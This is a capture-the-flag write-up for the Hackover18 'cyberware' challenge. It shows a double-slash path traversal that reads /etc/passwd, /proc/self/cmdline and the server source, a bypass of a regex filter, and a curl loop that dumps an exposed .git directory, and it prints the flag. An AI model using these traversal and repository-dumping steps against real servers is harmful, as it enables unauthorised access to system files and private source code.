

The Hackover18 CTF challenge “cyberware”:



The URL http://cyberware.ctf.hackover.de:1337/ leads to what looks like a directory listing of a few files:

None of these files are accessible with a normal browser; each request only returns “Protected by Cyberware 10.1” instead.







However, with curl the files are displayed:





We figured out that local system files can be requested by prefixing the path with //, for example //etc/passwd:

We then requested //proc/self/cmdline to find out which program is running; this returned cyberserver.py.
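The arguments in /proc/self/cmdline are separated by NUL bytes, so the raw response can look like one run-together string. A minimal sketch of splitting it, using a made-up sample value (the exact bytes the server returned are not reproduced here, and `parse_cmdline` is a hypothetical helper name):

```python
def parse_cmdline(raw: bytes) -> list[str]:
    """Split the NUL-separated contents of /proc/<pid>/cmdline into arguments."""
    # Arguments are separated by NUL bytes; empty parts (including the
    # trailing one after the final NUL) are dropped in this sketch.
    return [part.decode("utf-8", errors="replace")
            for part in raw.split(b"\0") if part]


# Hypothetical sample: only the script name cyberserver.py comes from the write-up.
sample = b"python3\0./cyberserver.py\0"
print(parse_cmdline(sample))
```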

Since there is a ctf user in /etc/passwd, we tried to get the file //home/ctf/cyberserver.py, which dumped the whole source code. Mirror here.
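Guessing the home directory can also be done mechanically, since the sixth colon-separated field of each /etc/passwd entry is the home directory. A small sketch under that assumption; the sample entry is invented for illustration (the real file content is not reproduced here) and `home_directories` is a hypothetical helper:

```python
def home_directories(passwd_text: str) -> dict[str, str]:
    """Map each user name in /etc/passwd-style text to its home directory."""
    homes = {}
    for line in passwd_text.splitlines():
        fields = line.split(":")
        # A regular entry has 7 fields: name, password, uid, gid, gecos, home, shell.
        if len(fields) == 7 and not line.startswith("#"):
            homes[fields[0]] = fields[5]
    return homes


# Invented sample entries, not the server's actual /etc/passwd.
sample = "root:x:0:0:root:/root:/bin/sh\nctf:x:1000:1000::/home/ctf:/bin/sh\n"
print(home_directories(sample)["ctf"])
```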

From the source code we learned that there is no way to list the files in a folder; the server only writes the contents of files that exist to the response. There is also this interesting check:

    if path.startswith('flag.git') or search('\\w+/flag.git', path):
        self.send_response(403, 'U NO POWER')
        self.send_header('Content-type', 'text/cyber')
        self.end_headers()
        self.wfile.write(b"Protected by Cyberware 10.1")
        return

Apparently there is a flag.git folder. The regex only matches when a word character comes directly before /flag.git, so we can circumvent it by simply requesting //home/ctf//flag.git. With the second /, the response changes to “406 Cyberdir not accaptable”, which shows that we got past this check.
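The bypass can be reproduced offline. This sketch copies only the condition from the check and assumes that `search` in the server is `re.search`; the exact form of `path` the server passes in (with or without a leading slash) is also an assumption, and `is_blocked` is a hypothetical name:

```python
import re


def is_blocked(path: str) -> bool:
    """Replicate only the condition of the quoted 403 check."""
    return path.startswith("flag.git") or re.search("\\w+/flag.git", path) is not None


# Single slash: "ctf" supplies the word characters right before "/flag.git".
print(is_blocked("home/ctf/flag.git/HEAD"))    # prints True
# Double slash: the character right before "/flag.git" is "/", not a word character.
print(is_blocked("/home/ctf//flag.git/HEAD"))  # prints False
```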

The flag.git folder is a normal .git directory. We can fetch the HEAD file to verify this:
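As a rough sanity check, a git HEAD file normally holds either a symbolic ref such as `ref: refs/heads/master` or a bare 40-character commit hash. A minimal sketch of testing a downloaded body against those two shapes (`looks_like_git_head` is a hypothetical helper, and the sample strings are illustrative rather than the server's actual response):

```python
import re


def looks_like_git_head(text: str) -> bool:
    """Return True if text has the shape of a git HEAD file."""
    text = text.strip()
    is_symbolic_ref = re.fullmatch(r"ref: refs/\S+", text) is not None
    is_detached_sha = re.fullmatch(r"[0-9a-f]{40}", text) is not None
    return is_symbolic_ref or is_detached_sha


print(looks_like_git_head("ref: refs/heads/master\n"))
print(looks_like_git_head("Protected by Cyberware 10.1"))
```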

There is already a wonderful tool to automatically download and extract files from open .git folders: internetwache/GitTools

However, I couldn’t figure out how to make it download the files. I think it treats the downloads as failures because the Content-Length header might contain a wrong size (hence the curl errors as well).
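If the guess about the Content-Length header is right, a client can still keep whatever bytes did arrive. In Python, `http.client` raises `IncompleteRead` when fewer bytes arrive than the header announced, and the exception carries the received data in its `partial` attribute. A sketch under that unverified assumption (`read_body` is a hypothetical helper, not part of GitTools):

```python
import http.client


def read_body(response) -> bytes:
    """Read a response body, keeping the partial data on a short read."""
    try:
        return response.read()
    except http.client.IncompleteRead as exc:
        # Fewer bytes arrived than Content-Length promised; keep what we got.
        return exc.partial
```

It would be called on a response object such as the one returned by `urllib.request.urlopen(url)`. A header that announces too few bytes would not raise at all and would silently truncate the body instead, so this only covers one direction of the mismatch.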

So we built the directory structure manually and downloaded all the standard files:

    $ mkdir -p ctf/.git
    $ cd ctf/.git/
    $ mkdir -p refs/remotes/origin objects/info logs/refs/remotes/origin logs/refs/heads objects/pack/ info refs/heads refs/master
    $ for x in HEAD objects/info/packs description config COMMIT_EDITMSG index packed-refs refs/heads/master refs/remotes/origin/HEAD refs/stash logs/HEAD logs/refs/heads/master logs/refs/remotes/origin/HEAD info/refs info/exclude; do curl "http://cyberware.ctf.hackover.de:1337//home/ctf//flag.git/$x" -o "$x"; done
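The same download plan can be written down in Python. This sketch only computes the (URL, local path) pairs and performs no network access; the URLs are built by plain string concatenation so that the double slashes survive, repeated names are dropped, and `plan_downloads` is a hypothetical helper:

```python
from pathlib import PurePosixPath

BASE = "http://cyberware.ctf.hackover.de:1337//home/ctf//flag.git/"


def plan_downloads(files, base=BASE, dest=".git"):
    """Return (url, local_path) pairs for each distinct file name, in order."""
    plan = []
    for name in dict.fromkeys(files):  # removes duplicates, keeps first-seen order
        plan.append((base + name, str(PurePosixPath(dest) / name)))
    return plan


for url, local in plan_downloads(["HEAD", "config", "refs/heads/master", "HEAD"]):
    print(url, "->", local)
```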

We then looked up the name of the pack file, downloaded it as well, and unpacked it:

    $ cat objects/info/packs
    P pack-1be7d7690af62baab265b9441c4c40c8a26a8ba5.pack
    $ curl http://cyberware.ctf.hackover.de:1337//home/ctf//flag.git/objects/pack/pack-1be7d7690af62baab265b9441c4c40c8a26a8ba5.pack -o objects/pack/pack-1be7d7690af62baab265b9441c4c40c8a26a8ba5.pack
    (...)
    $ cd ..
    $ git unpack-objects -r < .git/objects/pack/pack-1be7d7690af62baab265b9441c4c40c8a26a8ba5.pack
    Unpacking objects: 100% (15/15), done.
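Each pack is listed in objects/info/packs on a line of the form `P <pack file name>`, so the paths to fetch can be derived from that file. A minimal sketch, with `pack_paths` as a hypothetical helper name:

```python
def pack_paths(packs_text: str) -> list[str]:
    """Turn the contents of objects/info/packs into repository-relative paths."""
    paths = []
    for line in packs_text.splitlines():
        # Pack entries start with "P "; blank or other lines are ignored.
        if line.startswith("P "):
            paths.append("objects/pack/" + line[2:].strip())
    return paths


print(pack_paths("P pack-1be7d7690af62baab265b9441c4c40c8a26a8ba5.pack\n\n"))
```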

Now we can use the extractor.sh tool from the GitTools repository linked above:

    $ cd ~/GitTools/Extractor/
    $ ./extractor.sh ~/ctf extract
    ###########
    # Extractor is part of https://github.com/internetwache/GitTools
    #
    # Developed and maintained by @gehaxelt from @internetwache
    #
    # Use at your own risk. Usage might be illegal in certain circumstances.
    # Only for educational purposes!
    ###########
    [*] Destination folder does not exist
    [*] Creating...
    fatal: Not a valid object name infopacks
    fatal: Not a valid object name packpack-1be7d7690af62baab265b9441c4c40c8a26a8ba5.pack
    [+] Found commit: 38db5649511b84ec8f9eb6492dbe43eabe1e6a4a
    [+] Found file: /home/vagrant/GitTools/Extractor/extract/0-38db5649511b84ec8f9eb6492dbe43eabe1e6a4a/hackover18{Cyb3rw4r3_f0r_Th3_w1N}
    [+] Found commit: c0e01b58327e785a581c32b97e639014aef0f31e
    [+] Found file: /home/vagrant/GitTools/Extractor/extract/1-c0e01b58327e785a581c32b97e639014aef0f31e/ups
    [+] Found commit: 7ddcca9c9752a2f616f9754dc100fc5e52f8f6df
    [+] Found file: /home/vagrant/GitTools/Extractor/extract/2-7ddcca9c9752a2f616f9754dc100fc5e52f8f6df/qpoeqewrpokqwer
    [+] Found commit: 5e9613e8069eb7a83c1b4554954fb7329490333a
    [+] Found file: /home/vagrant/GitTools/Extractor/extract/3-5e9613e8069eb7a83c1b4554954fb7329490333a/asdasdasdqweq42134e2
    [+] Found commit: 1301f01e7dbd26acd8ca5b09fab05b957e702365
    [+] Found file: /home/vagrant/GitTools/Extractor/extract/4-1301f01e7dbd26acd8ca5b09fab05b957e702365/hackover16{Cyb3rw4hr_pl5_n0_taR}
    [+] Found commit: b69c0fc2567dc2d0e59c6e6a10c7e5afd3013b6a
    [+] Found commit: dd9ebcb882411a06c33ea9d8e4246acf70e7372e
    [+] Found commit: 19f882c9ad7aec1e682511525cc43e271896ae9e
    [+] Found file: /home/vagrant/GitTools/Extractor/extract/7-19f882c9ad7aec1e682511525cc43e271896ae9e/ups

The first file it found is the flag; the flag is the filename itself: hackover18{Cyb3rw4r3_f0r_Th3_w1N}
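With more commits, spotting the flag by eye gets tedious, so the extractor output can be filtered instead. A small sketch that assumes flags follow the `hackover18{...}` shape seen here (`find_flags` is a hypothetical helper, and the two sample lines are taken from the extractor output):

```python
import re

# Assumed flag format, inferred from the flag found in this challenge.
FLAG_RE = re.compile(r"hackover18\{[^}]+\}")


def find_flags(text: str) -> list[str]:
    """Return every hackover18{...} token found in text."""
    return FLAG_RE.findall(text)


output = (
    "[+] Found file: /home/vagrant/GitTools/Extractor/extract/"
    "0-38db5649511b84ec8f9eb6492dbe43eabe1e6a4a/hackover18{Cyb3rw4r3_f0r_Th3_w1N}\n"
    "[+] Found file: /home/vagrant/GitTools/Extractor/extract/"
    "4-1301f01e7dbd26acd8ca5b09fab05b957e702365/hackover16{Cyb3rw4hr_pl5_n0_taR}\n"
)
print(find_flags(output))
```

The hackover16 entry is skipped because the pattern only accepts the hackover18 prefix.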